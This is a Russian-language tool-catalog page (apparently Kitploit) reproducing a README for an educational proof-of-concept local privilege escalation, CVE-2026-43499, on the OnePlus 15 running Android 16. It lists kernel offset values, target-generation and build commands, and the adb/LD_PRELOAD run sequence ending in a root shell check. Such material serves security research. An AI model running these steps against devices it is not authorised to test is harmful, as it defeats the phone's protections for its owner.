Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-43499-OnePlus15 — Учебный proof-of-concept для локального повышения привилегий в Android 16 на OnePlus 15, включающий определение смещений ядра, генерацию целей и сборку эксплойта на основе LD_PRELOAD. | Kitploit
Инструменты/GitHubGitHub/bartixxx32/cve-2026-43499-oneplus15
Безопасность AndroidПовышение привилегийЭксплуатацияМобильная безопасностьОбучение и ОбразованиеРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHubbartixxx32/cve-2026-43499-oneplus15

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-43499-OnePlus15

Учебный proof-of-concept для локального повышения привилегий в Android 16 на OnePlus 15, включающий определение смещений ядра, генерацию целей и сборку эксплойта на основе LD_PRELOAD.

Репозиторий
6351 месяц назадЕщё не проверено

CVE-2026-43499 — OnePlus 15 LPE (Образовательный PoC)

ПРЕДУПРЕЖДЕНИЕ: Этот репозиторий предоставлен только в образовательных и исследовательских целях. Никаких предварительно собранных бинарных файлов или релизов не распространяется. Вы должны собрать всё из исходного кода.

Локальное повышение привилегий в Android 16 для OnePlus 15.

Форк x-spy/CVE-2026-43499-popsicle с исправлением выравнивания kallsyms и подтверждённым профилем OnePlus 15.

Профиль

Профиль содержит два физических адреса, которые необходимо подтвердить на рутированном устройстве с той же прошивкой:

root@kitploit:~
{
  "p0_phys_offset": "0x80000000",
  "p0_kernel_phys_load": "0xc7800000"
}

Автоопределение с рутированным устройством:

root@kitploit:~
python3 detect_offset.py

Генерация цели

Требуется Python 3 и llvm-objdump:

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --profile profile_oneplus15.json \
  -o source/src/target.h

Сборка

root@kitploit:~
make -C source clean preload

Если NDK не обнаружен автоматически:

root@kitploit:~
NDK_ROOT=/path/to/android-ndk make -C source clean preload

Результат: source/build/bin/preload.so

Запуск

root@kitploit:~
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell chmod 0644 /data/local/tmp/preload.so
adb shell LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true
adb shell /data/local/tmp/su -c id

Благодарности

  • x-spy за оригинальный эксплойт и обнаружение CVE
Скачать инструмент